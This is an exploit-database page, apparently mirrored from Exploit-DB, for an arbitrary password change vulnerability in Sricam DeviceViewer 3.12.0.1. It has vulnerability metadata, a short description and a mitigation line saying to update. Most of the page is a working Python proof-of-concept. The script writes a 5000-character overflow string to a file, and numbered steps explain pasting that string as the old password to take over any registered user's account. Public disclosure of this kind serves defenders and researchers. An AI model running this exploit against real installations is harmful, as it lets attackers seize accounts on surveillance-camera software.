header-logo
Suggest Exploit
vendor:
DeviceViewer
by:
Alessandro Magnosi
8.8
CVSS
HIGH
Arbitrary Password Change
20
CWE
Product Name: DeviceViewer
Affected Version From: 3.12.0.1
Affected Version To: 3.12.0.1
Patch Exists: YES
Related CWE: N/A
CPE: a:sricam:deviceviewer:3.12.0.1
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7
2019

DeviceViewer 3.12.0.1 – Arbitrary Password Change

A vulnerability in Sricam DeviceViewer 3.12.0.1 allows an attacker to change the password of any registered user by creating a malicious payload file and setting it as the old password when changing the password. The new password can be set to whatever the attacker wants. To confirm the password change, the application must be restarted and the new password can be used to log in.

Mitigation:

Users should update to the latest version of Sricam DeviceViewer to ensure that the vulnerability is patched.
Source

Exploit-DB raw data:

# Exploit Title: DeviceViewer 3.12.0.1 - Arbitrary Password Change
# Date: 2019-09-10
# Exploit Author: Alessandro Magnosi
# Vendor Homepage: http://www.sricam.com/
# Software Link: http://download.sricam.com/Manual/DeviceViewer.exe
# Version: v3.12.0.1
# Tested on: Windows 7

#!/usr/bin/python

# Steps to reproduce:
#   1. Generate the payload executing the PoC
#   2. Login in the Sricam DeviceViewer application as any registered user
#   3. Go to System Tools -> Change Password
#   4. Set the old password as the malicious payload, and the new password as whatever you want
#   5. The password will be changed with the new one
#   6. To confirm, restart the application and try to login with the new password

payload = "A" * 5000

try:
	bypass = open("bypass.txt","w")
	print("### Sricam DeviceViewer 3.12.0.1 Change Password Security Bypass")
	print("### Author: Alessandro Magnosi\n")
	print("[*] Creating old password file")
	bypass.write(payload)
	bypass.close()
	print("[+] Old password file created\n")
	print("[i] When changing password, set the old password to the file contents")
	print("[i] Close the program and reopen it")
	print("[i] Log in with new password")
except:
	print("[!] Error creating the file")

Navigation

Suggest Exploit

Services By CQR